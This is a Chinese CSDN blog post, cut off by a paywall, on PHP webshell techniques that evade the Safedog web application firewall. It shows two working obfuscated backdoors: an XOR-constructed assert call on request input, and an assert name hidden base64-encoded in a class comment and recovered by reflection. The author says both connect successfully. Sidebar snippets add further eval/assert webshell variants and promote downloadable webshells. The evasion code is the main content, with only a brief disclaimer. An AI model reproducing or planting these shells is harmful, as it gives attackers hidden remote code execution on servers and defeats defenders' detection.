渗透测试 | php的webshell绕过方法总结

最新推荐文章于 2024-07-29 11:58:37 发布
最新推荐文章于 2024-07-29 11:58:37 发布
阅读量1.3k 收藏 22
点赞数 35
文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/135770608
版权
本文总结了10种PHP webshell绕过方法,包括通过异或运算、获取注释、字符运算符、end函数、常量、双美元符、函数定义、类定义、多传参和get_defined_functions等,所有方案都能成功绕过安全狗检测。同时强调这些知识仅用于网络安全技术讨论,不得用于非法用途。
摘要由CSDN通过智能技术生成

1.php的异或运算

$a="~+d()"^"!{+{}"

这个表示了$a=这两个字符串之间进行一个异或运算
运算异或运算符,按二进制位进行异或运算
这里的运算会把符号转化为ascii码,再转化为二进制,再转化为十进制进行运算,再把结果转化为ascii码
通过这个转换的方式来绕过检测

<?php

$a= ("!"^"@").'ssert';

$a($_REQUEST[x]);

?>

测试可以成功连接

图片

2.通过获取注释去绕过

<?php



/**

* YXNzZXJ0YmZnZmc=

*/

class Example

{

public function fn()

{

}

}

通过一个空的类去获取,

$reflector = new ReflectionClass('Example'); //这里为通过反射获取类的注释



$zhushi = substr(($reflector->getDocComment()), 7, 12);//然后去截断获取注释里的字符,注意getDocComment只能通过文件最开始的类来调用才会把注释内容显示

$zhushi = base64_decode($zhushi);

$zhushi = substr($zhushi, 0, 6);



echo $zhushi;



foreach (array('_POST','_GET') as $_request) {

foreach ($$_request as $_key=>$_value) {

$$_key= $_value;

}

}

/*设置一个数组,参数为_POST,_GET,然后把该数组用$_request去表示,再设置一个遍历,把$_request设为一个可变变量,再键值分离

再设$$_key=$_value,做一个定义,定义可变变量$_key键等于值得内容再设$$_key=$_value,做一个定义,定义可变变量$_key键等于值得内容

*/

$zhushi($_value);

//最后就是assert(传入的变量值)

?>

原理就是通过把shell加密并放到注释里,利用类的反射机制获取类的注释,再解密去生成shell
测试可以成功连接

最低0.47元/天 解锁文章
zkzq
关注
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3346
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web
php webshell
11-24
php webshell 需要的朋友可以下载!
关于PHP中的webshell
weixin_33824363的博客
05-16 9552
一、webshell简介 webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 顾名思义,“web”的含义是显然需要服务器开放...
傻瓜式PHP-Webshell免杀学习手册,零基础小白也能看懂
最新发布
qq_69775412的博客
07-29 838
首先,要知己知彼,才能针对性做出策略来使得WebShell成功免杀通过对上面所说两部分敏感内容的拼接、混淆以及变换,来绕过WAF的检测逻辑,如下:​​​​​​​$tmp = "";$a = $a/10;//sysTem(高危函数)$f($_POST['aabyss']);同样,可以配合文件名玩出一些花活,我们建一个PHP名字为976534.php​​​​​​​$tmp = "";$a = $a/10;
PHP webshell
yxwb1253587469的博客
07-21 1075
简单版 /*-------------------------------------------- Codz By pr0cess MSN:l4ndishezhang@hotmail.com Modified By Badboy Date:2009/23/06 ---------------------------------------------- */ header("Content-
phpwebshell
06-08
不错的webshell,希望能有帮助到你!
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3822
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
渗透测试如何快速拿到Webshell1
08-03
渗透测试如何快速拿到Webshell】的技巧主要集中在文件操作上,包括文件上传、文件删除、文件修改以及读取/下载文件。这些操作是Web安全漏洞利用中的常见手段,尤其在进行渗透测试时,能够有效地探测系统安全性。 ...
php 实现webshell
echo_heng的博客
12-15 2308
php实现webshell主要依靠swoole和ssh2扩展,前端展示页面使用xterm 废话不多说直接上代码 后端代码 <?php /** * websocket服务器(使用swoole) * 使用ssh登录服务器 */ class Ws{ private $shell; private $connection; private $isConnection; private $ws; public function __construct(){
php webshell 下载(目前功能强大齐全的phpwebshell
11-09
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,好不容易找到这功能齐全的php版的webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
强大的php webshell
06-22
phpwebshell 就一个文件,可以管理服务器文件管理增删改,服务器mysql管理,创建服务器账户,批量挂马、清马,检测端口号,执行cmd命令等,超乎你的想象
php webshell 下载(自测 功能强大齐全的phpwebshell
06-30
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可。无需更改任何。(自测功能完整,无任何阉割,不接黑)
各种php webshell大全
10-14
声明:本PHP-webshell仅供学习交流以及网站安全检测之用,功能过于强大,请不要用过非法用途,否则一切后果由使用者本人承担! 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密码,可自由修改此密码。 网络上ASP的webshell很多,但是发现PHP webshell少了很多,这是我收藏的各种webshell,给大家分享一下,省得大家到处找。顺便在这里赚点积分,呵呵。。
new.bypass_bypass_NEW_免杀_webshell_phpwebshell_
10-03
免杀webshell
slopShell:强大的PHP Webshell
weixin_43977912的博客
07-04 367
关于slopShell slopShell是一款功能强大的PHP Webshell,有了它,你就不需要再用到其他Webshell了。 为了让这个shell正常工作,广大研究人员只需要做两件事情,一是能够将php文件发送给目标用户,二是能够向这个Webshell发送HTTP请求 工具安装 首先,广大研究人员需要运行一台由自己控制的pgsql服务器,然后根据自己的操作系统类型选择对应的安装命令: Debian apt install -y postgresql php php-pear &&
php webshell编写,php webshell学习
weixin_34805308的博客
03-26 768
一、环境kali 192.168.43.177开户apache /etc/init.d/apache2 start/var/www/html/目录下编辑php代码hackbarhttps://github.com/Mr-xn/hackbar2.1.3二、php基础输出函数:echo - 可以输出一个或多个字符串print - 只允许输出一个字符串,返回值总为 1提示:echo 输出的速度比 pri...
WebShell变形
bylfsj的博客
10-31 547
4.1.7. WebShell¶ 4.1.7.1. 常见变形¶ GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz...
网站安全:从后台获取webshell的十大方法总结
其次,文档提到了添加或修改上传类型,如bbsxp和ewebeditor后台,允许添加asa或.aspasp类型的文件,使得原本被过滤的.asp文件可以通过这种方式绕过限制,实现webshell的上传。 接下来,文档列举了其他几种获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值